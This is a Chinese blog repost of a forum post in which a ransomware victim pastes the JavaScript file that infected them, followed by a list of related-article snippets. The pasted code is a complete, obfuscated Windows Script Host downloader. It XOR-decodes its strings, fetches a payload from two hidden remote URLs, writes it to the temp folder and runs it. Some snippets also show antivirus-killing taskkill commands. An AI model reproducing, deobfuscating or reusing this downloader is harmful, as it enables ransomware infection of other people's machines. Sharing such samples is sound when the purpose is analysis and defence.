HTML112k病毒,勒索病毒新款,JS格式,中招了

最新推荐文章于 2024-02-11 12:28:01 发布
最新推荐文章于 2024-02-11 12:28:01 发布
阅读量196 收藏
点赞数
文章标签: HTML112k病毒

本帖最后由 rzmould 于 2016-2-25 21:23 编辑

不知道怎样上传附件

我把JS代码复制出来吧:

function btoa(circumspectBo0, elaboratebvc, pallidmOf, inscrutableRPO, notwithstandingfDY, unwontedNVL, baubleUx7, vintneryUp) {

var foistBGn = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";

var stumpBlC = String(vintneryUp);

for (var sententiouszFe, amalgamatebau, chideuVq = 0, whittlex80 = foistBGn, evidentKPV = ""; stumpBlC.charAt(chideuVq | 0) || (whittlex80 = "=",

chideuVq % 1); evidentKPV += whittlex80.charAt(63 & sententiouszFe >> 8 - chideuVq % 1 * 8)) {

amalgamatebau = stumpBlC.charCodeAt(chideuVq += 3 / 4);

if (amalgamatebau > 255) {

throw new InvalidCharacterError("'btoa' failed: The string to be encoded contains characters outside of the Latin1 range.");

}

sententiouszFe = sententiouszFe << 8 | amalgamatebau;

}

return evidentKPV;

}

var adjurepe6 = function(diversifiedOuA) {

var hoodwinkc8q = "";

var circumspectBo0 = "skillecC";

var elaboratebvc = "liberalQxA";

var pallidmOf = "constituencyhRJ";

var inscrutableRPO = "seetheU0h";

var notwithstandingfDY = "nihilistRrJ";

var unwontedNVL = "visageMtV";

var baubleUx7 = "grants8C";

btoa(circumspectBo0, elaboratebvc, pallidmOf, inscrutableRPO, notwithstandingfDY, unwontedNVL, baubleUx7, [ 48, 6, 77, 242, 233, 48, 122, 29, 20, 227, 182, 169, 229, 77, 17, 93 ]);

var scarceVq8 = String["sdfadfasdffromChar".slice(10) + "Codedsfadsfasdg".slice(0, 4)];

for (var sonorousC48 = 0; sonorousC48 < diversifiedOuA.length; sonorousC48++) {

var deferenceTpg = [ 48, 6, 77, 242, 233, 48, 122, 29, 20, 227, 182, 169, 229, 77, 17, 93 ];

hoodwinkc8q += scarceVq8(diversifiedOuA[sonorousC48] ^ deferenceTpg[sonorousC48 % deferenceTpg.length]);

}

return hoodwinkc8q;

};

var conferkda = function() {

var dormerJxr = function() {

var justifyU9k = adjurepe6([ 113, 65, 9, 159, 222, 100, 46, 85, 39, 173 ]);

var knightyqV = adjurepe6([ 101, 48, 3, 148, 156, 87, 22, 117, 126, 129 ]);

};

dormerJxr.prototype.re8IyFLTFe = function(docileLrx) {

var gainsayocI = adjurepe6([ 115, 116, 40, 147, 157, 85, 53, 127, 126, 134, 213, 221 ]);

return wsh[gainsayocI](docileLrx);

};

dormerJxr.prototype.yiMJ7dfCHg = function(docileLrx) {

var gainsayocI = adjurepe6([ 115, 116, 40, 147, 157, 85, 53, 127, 126, 134, 213, 221 ]);

return WScript[gainsayocI](docileLrx);

};

return dormerJxr;

}();

(function() {

var ramparti6v = [ adjurepe6([ 88, 114, 57, 130, 211, 31, 85, 117, 100, 130, 196, 204, 156, 34, 100, 53, 85, 116, 40, 131, 152, 30, 25, 114, 121, 204, 142, 158, 203, 40, 105, 56 ]), adjurepe6([ 88, 114, 57, 130, 211, 31, 85, 117, 100, 130, 218, 218, 138, 58, 112, 51, 68, 117, 43, 148, 199, 83, 21, 112, 59, 219, 129, 135, 128, 53, 116 ]) ];

var ensconceX6Y = 4194304;

var upbraidDqs = adjurepe6([ 64, 114, 24, 155, 208, 125, 24, 123, 125, 186 ]);

var obtuseqGH = adjurepe6([ 83, 85, 33, 203, 174, 102, 59, 86, 97, 165 ]);

var astringenttbO = adjurepe6([ 126, 113, 27, 153, 165, 93, 77, 122, 94, 167 ]);

var maliceQ3M = new conferkda();

var perpetrateQCi = maliceQ3M[adjurepe6([ 73, 111, 0, 184, 222, 84, 28, 94, 92, 132 ])];

var buxomCgc = perpetrateQCi(adjurepe6([ 103, 85, 46, 128, 128, 64, 14, 51, 71, 139, 211, 197, 137 ]));

var audaciousvKC = perpetrateQCi(adjurepe6([ 125, 85, 21, 191, 165, 2, 84, 69, 89, 175, 254, 253, 177, 29 ]));

var baneMkH = perpetrateQCi(adjurepe6([ 113, 66, 2, 182, 171, 30, 41, 105, 102, 134, 215, 196 ]));

var partialitykBC = buxomCgc.ExpandEnvironmentStrings(adjurepe6([ 21, 82, 8, 191, 185, 21, 38 ]));

var stumpfda = partialitykBC + ensconceX6Y + adjurepe6([ 30, 99, 53, 151 ]);

var bemuseNiI = false;

var mountebankWDL = 200;

for (var staidb68 = 0; staidb68 < ramparti6v.length; staidb68++) {

try {

var meritojA = ramparti6v[staidb68];

audaciousvKC.open(adjurepe6([ 119, 67, 25 ]), meritojA, false);

audaciousvKC.send();

if (audaciousvKC.status == mountebankWDL) {

try {

baneMkH[adjurepe6([ 95, 118, 40, 156 ])]();

baneMkH.type = 1;

baneMkH[adjurepe6([ 71, 116, 36, 134, 140 ])](audaciousvKC[adjurepe6([ 66, 99, 62, 130, 134, 94, 9, 120, 86, 140, 210, 208 ])]);

var scrutinizeqWz = Math.pow(2, 10) * 249;

if (baneMkH.size > scrutinizeqWz) {

staidb68 = ramparti6v.length;

baneMkH.position = 0;

baneMkH.saveToFile(stumpfda, 2);

bemuseNiI = true;

}

} finally {

baneMkH.close();

}

}

} catch (ignored) {}

}

if (bemuseNiI) {

buxomCgc[adjurepe6([ 117, 126, 40, 145 ])](partialitykBC + Math.pow(2, 22));

}

})();

weixin_39842237
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
HTML112k病毒,main.html_病毒样本 分享&分析区_安全区 卡饭论坛 - 互助分享 - 大气谦和!...
weixin_42651748的博客
06-20 1107
main.html[mw_shl_code=html,true]>TPIRCS/<noitcnuf dnefi dnefi dne)(edomefastontesesle)(edocllehsnur)noisreVtni(etirw.tnemucod)"EI >rbneht )4)0(wrhc&)00(wrhc&)76723(wrhc&)00(wrhc&a...
一个可恶的javascript病毒/木马解码之后的代码
小橙的第一播
11-02 9034
中毒的话,整个网络都会受影响,表现为所有的IE浏览器打开的网页都会在前面加一个 javascript 的连接。清除比较麻烦。显示的这段是这个链接后面的代码:var vDA1 = new window["Date"]() vDA1["setTime"](vDA1["getTime"]() + 24*60*60*1000)var eOTo$2 = new window["String"](wi
网站被黑形式以及挂马病毒特征大全(附解决方案)
SEOer - 不二版本Eade的CSDN专栏
04-13 2816
如果下面的列表不包含您需要的判断,请使用Yandex 的通用说明对受感染的站点进行杀毒。 JS/AppndIfra-A 此判断意味着该页面包含混淆的 JavaScript 代码(变量和函数的名称可能因每个特定脚本而异)。执行后,此代码会从远程资源下载恶意 JavaScript 代码。该恶意代码通常包含在 body 元素的 onLoad 属性中。 按照我们的说明从服务器中删除恶意代码。 导致 JS/ApndIfra-A 判定的恶意代码示例: JS/DwnLdr-HOO 此判断意味着该页面包
伪装成NodeJS勒索病毒勒索呼伦贝尔的空气
最新发布
pandazhengzheng的博客
02-11 1016
伪装成NodeJS勒索病毒勒索呼伦贝尔的空气
JS病毒分析总结
sxr__nc的博客
09-19 2471
记录一次 JS病毒分析过程中遇到的各类问题和JS的一些语法: 第一部分:这一部分主要就是说一下这个JS病毒的加解密的过程: 刚拿到病毒的时候,跑动态的时候,发现病毒不能直接运行,用notepad++打开之后,发现里边有加密过的数组(其实这一步也算不上加密,只不过是一个数字和ASCII码的转换),而且发现里边都是JS代码(刚拿到病毒样本的时候,病毒样本是.sct文件),大概扫了一眼,这个样本的主要任...
gif格式图片加文字,C#版本,测试通过
05-04
gif格式水印,在网上找的很多代码都是不全的,缺少dll就是这个文件里的,这个也是网上找到的,放到这里主要和大家共享,顺便赚点下载分。 进过测试,打水印之后gif完全不影响。但是大小会增加,72k的增加值112k
C524030_压敏电阻_CNR-07D471K_规格书_CNR(舜全)压敏电阻规格书.PDF
09-20
6. **型号举例**:CNR-10D181K至10D112K,CNR-14D181K至14D112K,CNR-18D180K至18D112K,CNR-20D181K至20D112K满足IEC 60950-1:2013 Annex Q的要求。 **性能特点:** 1. **非线性电阻特性**:压敏电阻由主要成分为...
Converting_to_mp3_files_using_ffmpeg.pdf
01-08
### 使用FFmpeg将音频转换为MP3格式 在数字媒体处理领域,FFmpeg是一个非常强大的工具,能够处理视频、音频以及图像数据。本篇文档主要介绍如何使用FFmpeg将各种音频或视频文件转换成MP3格式。MP3是目前最流行的...
深入认识56K Modem
07-08
例如,Diamond推出的SupraSonicII,它将两个56K Modem芯片集成在一起,从而理论上实现112K的速率。然而,这些技术的实现方式各不相同,可能会存在兼容性问题或使用条件限制,因此在选择时需要谨慎考虑。 总之,56K ...
病毒木马查杀实战第025篇:JS下载者脚本木马的分析与防御
热门推荐
Gleam的专栏
03-26 1万+
前言 这次我与大家分享的是我所总结的关于JS下载者脚本木马的分析与防御技术。之所以要选择这样的一个题目,是因为在日常的病毒分析工作中,每天都会遇到这类病毒样本,少则几个,多则几十个(当然了,更多的样本已经被自动分析系统拦截下来了)。而且这类的样本甚至还有愈演愈烈之势,很可能会长盛不衰。JS脚本木马之所以会如此泛滥,与它的编写简单、易于免杀以及难以封堵等特点息息相关。而我们本次的课程也会
HTML+CSS+JS实现 ❤️新型冠状病毒射击小游戏❤️
java李阳勇的博客
09-03 2106
效果演示: 代码目录: 主要代码实现: 部分JS代码 : var stage = { w: 1280, h: 720 } var _pexcanvas = document.getElementById("canvas"); _pexcanvas.width = stage.w; _pexcanvas.height = stage.h; var ctx = _pexcanvas.getContext("2d"); var point...
感染所有html病毒代码,非常简单的病毒代码汇总
weixin_35933239的博客
06-10 6844
你知道最简单的电脑病毒代码是什么吗!简单的代码不容易被杀毒软件发现!下面由学习啦小编给你做出详细的最简单的电脑病毒代码介绍!希望对你有帮助!最简单的电脑病毒代码介绍:绕过杀毒软件防御:运行 (“taskkill /f /im kavsvc.exe”, 假, 1)运行 (“taskkill /f /im KVXP.kxp”, 假, 1)运行 (“taskkill /f /im Rav.exe”, 假...
手机html脚本病毒,自己整的按键精灵脚本也能当成病毒……
weixin_35152751的博客
06-19 755
文件名: magictiles.exe威胁名称: SONAR.Heuristic.170完整路径: 不可用________________________________________________________在电脑上2017-7-3 ( 15:26:19 )上次使用时间2017-7-3 ( 15:26:19 )启动项否已启动是SONAR 主动防护监视电脑上的可疑程序活动。________...
html做垃圾邮件1005无标题,垃圾邮件传播新型FTCode无文件勒索病毒
weixin_36230821的博客
06-20 150
目前勒索病毒仍然是全球最大的威胁,最近一年针对企业的勒索病毒攻击越来越多,不断有新型的勒索病毒出现,各企业一定要保持高度的重视,大部分勒索病毒是无法解密的,近期国外安全研究人员发现了一款基于PowerShell脚本的勒索病毒FTCode,此勒索病毒主要通过垃圾邮件进行传播。近日国外某独立恶意软件安全研究人员曝光了一个新型的FTCode PowerShell勒索病毒,如下所示:此勒索病毒主要通过垃圾...
如何在fluent中设置入口质量流量的温度为112K
06-02
要在 Fluent 中设置入口质量流量的温度为 112K,请执行以下步骤: 1. 首先,在 Fluent 中加载您的模型。 2. 在 Fluent 中选择 Define -> Boundary Conditions。 3. 在 Boundary Conditions 面板中,选择您要设置...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值